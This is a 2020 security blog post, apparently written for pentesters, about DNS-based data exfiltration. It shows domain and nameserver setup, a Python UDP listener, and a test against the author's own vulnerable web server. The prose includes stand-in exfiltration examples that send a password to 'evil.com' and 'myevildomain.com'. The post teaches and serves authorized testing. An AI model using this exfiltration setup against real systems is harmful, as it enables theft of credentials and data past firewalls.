<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
  <meta name="generator" content="Jekyll">

  <title>Setting Up Your Own Malicious DNS Server For Data Exfiltration (Without a DNS Server)</title>

  <link rel="stylesheet" href="/css/main.css">
  <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
  <link href="/atom.xml" type="application/atom+xml" rel="alternate" title="ATOM Feed" /> <!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Setting Up Your Own Malicious DNS Server For Data Exfiltration (Without a DNS Server) | John Woodman’s Security Blog</title>
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="Setting Up Your Own Malicious DNS Server For Data Exfiltration (Without a DNS Server)" />
<meta name="author" content="John Woodman" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Data exfiltration is a key component of any red team/penetration testing assesment. Sometimes it’s as simple as scp’ing the sensitive data over an SSH connection. Other times, however, more sophisticated methods need to be used. One such common method is exfiltrating data through specially crafted URL requests to your public web server, such as placing the sensitive data as a GET parameter (www.evil.com?stolendata=password123). But what if firewall permissions are blocking any outbound HTTP traffic on the victim server? Or has a whitelist of allowed sites and yours isn’t on it (obviously)? Another method is still possible: DNS." />
<meta property="og:description" content="Data exfiltration is a key component of any red team/penetration testing assesment. Sometimes it’s as simple as scp’ing the sensitive data over an SSH connection. Other times, however, more sophisticated methods need to be used. One such common method is exfiltrating data through specially crafted URL requests to your public web server, such as placing the sensitive data as a GET parameter (www.evil.com?stolendata=password123). But what if firewall permissions are blocking any outbound HTTP traffic on the victim server? Or has a whitelist of allowed sites and yours isn’t on it (obviously)? Another method is still possible: DNS." />
<meta property="og:site_name" content="John Woodman’s Security Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-06-10T00:00:00+00:00" />
<script type="application/ld+json">
{"@type":"BlogPosting","headline":"Setting Up Your Own Malicious DNS Server For Data Exfiltration (Without a DNS Server)","dateModified":"2020-06-10T00:00:00+00:00","datePublished":"2020-06-10T00:00:00+00:00","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/DNS-Exfiltration-Setup/"},"author":{"@type":"Person","name":"John Woodman"},"url":"/posts/DNS-Exfiltration-Setup/","description":"Data exfiltration is a key component of any red team/penetration testing assesment. Sometimes it’s as simple as scp’ing the sensitive data over an SSH connection. Other times, however, more sophisticated methods need to be used. One such common method is exfiltrating data through specially crafted URL requests to your public web server, such as placing the sensitive data as a GET parameter (www.evil.com?stolendata=password123). But what if firewall permissions are blocking any outbound HTTP traffic on the victim server? Or has a whitelist of allowed sites and yours isn’t on it (obviously)? Another method is still possible: DNS.","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

</head>


<body>
  <div id="wrapper">
    <header>
  <div>
    <a href="/">
    
    <h1>john@home:~$</h1>
    </a>
    <div class="header-links">
      <a href="/archive"><h2 class="header-link">Archive</h2></a>
<a href="/about"><h2 class="header-link">About</h2></a>
<a href="/hackthebox"><h2 class="header-link">HackTheBox</h2></a>
<a href="/ctf"><h2 class="header-link">CTF</h2></a>
<a href="https://twitter.john-woodman.com" target="_blank"><h2 class="header-link">HackerTwitter</h2></a>
<a href="/gardening"><h2 class="header-link">Gardening</h2></a>
<a href="/atom.xml"><h2 class="header-link">RSS</h2></a>
<a href="https://twitter.com/JohnWoodman15" target="_blank"><h2 class="header-link"><img src="/assets/twitter.png" style="vertical-align:middle" width="45"/></h2></a>
<a href="https://github.com/JohnWoodman" target="_blank"><h2 class="header-link"><img src="/assets/github.png" style="vertical-align:middle; margin-left:-7px" width="45"/></h2></a>

    </div>
  </div>
</header>

    <div class="container">
      <section id="main_content">
        <article>
  <h1>Setting Up Your Own Malicious DNS Server For Data Exfiltration (Without a DNS Server)</h1>
  <time datetime="2020-06-10T00:00:00+00:00" class="by-line">10 Jun 2020</time>
  <p>Data exfiltration is a key component of any red team/penetration testing assesment. Sometimes it’s as simple as scp’ing the sensitive data over an SSH connection. Other times, however, more sophisticated methods need to be used. One such common method is exfiltrating data through specially crafted URL requests to your public web server, such as placing the sensitive data as a GET parameter (www.evil.com?stolendata=password123). But what if firewall permissions are blocking any outbound HTTP traffic on the victim server? Or has a whitelist of allowed sites and yours isn’t on it (obviously)? Another method is still possible: DNS.</p>

<p>In this post, I’ll be showing how I set up a public malicious (depending on how you use it) DNS server for exfiltrating data without actually having to run a DNS server ;).</p>

<h2 id="what-is-dns-exfiltration"><a href="#header-1"></a>What Is DNS Exfiltration?</h2>

<p>The general idea of DNS exfiltration isn’t unsimilar to exfiltrating data through HTTP web requests. Sensitive data is attached to a DNS query that can then be viewed by our malicious DNS server. In this case, the sensitive data is prepended onto the subdomain of our controlled public domain. For example, if we were able to access the password of a user on a victim’s machine, in order to exfil that data, we would have the victim machine make a DNS request for password123.myevildomain.com, with the “password123” being the victim’s password. Since own myevildomain.com, the request to resolve password123 would come to my server. The best part is, I don’t even have to actually respond to the request since I’ve already got what I came for.</p>

<h2 id="what-youll-need"><a href="#header-2"></a>What You’ll Need</h2>

<ul>
  <li>Public Server you control (I used a digital ocean server)</li>
  <li>Public domain name linked to that server</li>
</ul>

<h2 id="setting-up-the-pulbic-domain"><a href="#header-3"></a>Setting Up The Pulbic Domain</h2>

<p>The first thing you need is a publicly registered domain. You can do this on a number of sites, but I used godaddy to register john-woodman.com and pointed it to my digitalocean server.</p>

<h3 id="creating-a-hostname-for-our-nameserver"><a href="#header-4"></a>Creating A Hostname For Our Nameserver</h3>
<p>Once I registered the domain, I then added my own hostname as a nameserver through godaddy. The reason I had to do this is because nameserver records can’t specify an IP address, it must be a hostname. I made the hostname for the nameserver ns.john-woodman.com and pointed it to my digitalocean server IP.</p>

<p><img src="/assets/2020-06-10-DNS-Exfiltration-Setup/1.png" alt="" height="100%" width="100%" style="display: block;  margin-right: auto;" /></p>

<h3 id="setting-nameservers-to-digitaloceans"><a href="#header-5"></a>Setting Nameservers To DigitalOcean’s</h3>
<p>DigitalOcean actually has the ability to manage DNS records for you. While I could do everything on godaddy or whichever name resolution service you chose, I found DigitalOcean has a nice, simple interface. In godaddy, I set the custom nameservers to DigitalOcean’s so that any DNS requests made to john-woodman.com would go to DigitalOcean.</p>

<p><img src="/assets/2020-06-10-DNS-Exfiltration-Setup/2.png" alt="" height="100%" width="100%" style="display: block;  margin-right: auto;" /></p>

<p>Now that we have that setup, we can do everything else on DigitalOcean.</p>

<h3 id="redirecting-subdomain-requests"><a href="#header-6"></a>Redirecting Subdomain Requests</h3>
<p>I now have to create a few DNS records so that any requests to a specific subdomain will be redirected to my DNS Server instead of being handled by DigitalOcean’s. I first have to create an A record that points all requests to john-woodman.com to my IP (this is mostly to keep my website up and running). I then have to create an A record that points the nameserver domain (ns.john-woodman.com) to my server’s IP. Now, unfortunately, with NS records, I’m not able to specify a wildcard in the subdomain (such as <code class="language-plaintext highlighter-rouge">*</code>.john-woodman.com). From what I can gather, it seems to just not be supported by DNS, with no reason why. Either way, we can get around this by actually just specifying any name for the subdomain, and all subdomain requests sent to that subdomain (subception) will be directed to our DNS server. In my case, I chose a completely random subdomain steve.john-woodman.com. You can call it whatever you want (probably best not to have special characters just to be safe). So when im exfiltrating data, the DNS request would look like for example: password123.steve.john-woodman.com. This is what my DNS configuration looks like on DigitalOcean.</p>

<p><img src="/assets/2020-06-10-DNS-Exfiltration-Setup/3.png" alt="" height="100%" width="100%" style="display: block;  margin-right: auto;" /></p>

<h2 id="setting-up-the-listener"><a href="#header-7"></a>Setting Up The Listener</h2>
<p>The nice part is we don’t actually have to run any DNS service on our server. We can just set up a simple python listener, sift through the data we recieve and grab what we need. Below is the code I wrote to listen on UDP port 53 (DNS requests come in on UDP for the most part).</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">dnslib</span> <span class="kn">import</span> <span class="n">DNSRecord</span>

<span class="n">server</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_DGRAM</span><span class="p">)</span>

<span class="n">server</span><span class="p">.</span><span class="n">bind</span><span class="p">((</span><span class="s">'0.0.0.0'</span><span class="p">,</span> <span class="mi">53</span><span class="p">))</span>

<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
    <span class="n">data</span><span class="p">,</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">server</span><span class="p">.</span><span class="n">recvfrom</span><span class="p">(</span><span class="mi">4096</span><span class="p">)</span>
    <span class="n">d</span> <span class="o">=</span> <span class="n">DNSRecord</span><span class="p">.</span><span class="n">parse</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">questions</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">_qname</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">data</span><span class="p">:</span>
        <span class="n">server</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">break</span></code></pre></figure>

<h2 id="testing-and-exploiting"><a href="#header-8"></a>Testing and Exploiting</h2>
<p>To make sure that it works, I can run a simple nslookup and see if my listener picks up the request.</p>

<p><img src="/assets/2020-06-10-DNS-Exfiltration-Setup/4.png" alt="" height="80%" width="80%" style="display: block;  margin-right: auto;" /></p>

<p>The nslookup failed, but thats expected since for one, we don’t actually have any DNS service running, and second, the requested subdomain doesn’t exist. But as you can see, our server did recieve the request and, most importantly, we can see the subdomain.</p>

<p><img src="/assets/2020-06-10-DNS-Exfiltration-Setup/5.png" alt="" height="75%" width="75%" style="display: block;  margin-right: auto;" /></p>

<h2 id="exploiting"><a href="#header-9"></a>Exploiting</h2>
<p>To really fully test our setup, I created a simple vulnerable webserver with a login page connected to a PostgreSQL database that contains login credentials. The webserver is vulnerable to SQL injection, but no output is returned to the user. There’s a few different methods I could use (time-based for example), but why not use DNS exfiltration.</p>

<p><img src="/assets/2020-06-10-DNS-Exfiltration-Setup/6.png" alt="" height="100%" width="100%" style="display: block;  margin-right: auto;" /></p>

<p>I won’t go into the exploit itself, but you can read about it <a href="https://portswigger.net/web-security/sql-injection/blind">here</a>. Using Burp, I sent the URL encoded exploit that retrieved the password from the SQL table and sent it as the subdomain in the DNS request.</p>

<p><img src="/assets/2020-06-10-DNS-Exfiltration-Setup/7.png" alt="" height="100%" width="100%" style="display: block;  margin-right: auto;" /></p>

<p>With the listener running on our server, we recieved the DNS request and can see the password that was stored in the PostgreSQL database set as the subdomain!</p>

<p><img src="/assets/2020-06-10-DNS-Exfiltration-Setup/8.png" alt="" height="75%" width="75%" style="display: block;  margin-right: auto;" /></p>

<h2 id="conclusion"><a href="#header-10"></a>Conclusion</h2>
<p>The inspiration for this project was trying to run my own server for DNS exfiltration instead of having to pay for the pro version of BurpSuite, which has a BurpCollaborator that will do this for you. I learned a lot more about DNS through this project, and I hope I was able to help you learn something too!</p>

</article>

      </section>
    </div>
  </div>

   <footer>
  <a href="https://creativecommons.org/licenses/by-nc/3.0/deed.en_US">
    <span>
        <b>John Woodman</b>
    </span>
    
    <span>© 2020</span>
  </a>
</footer>

  
    <script type="text/javascript">
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-154967710-1', 'auto');
  ga('send', 'pageview');
</script>
  
</body>

</html>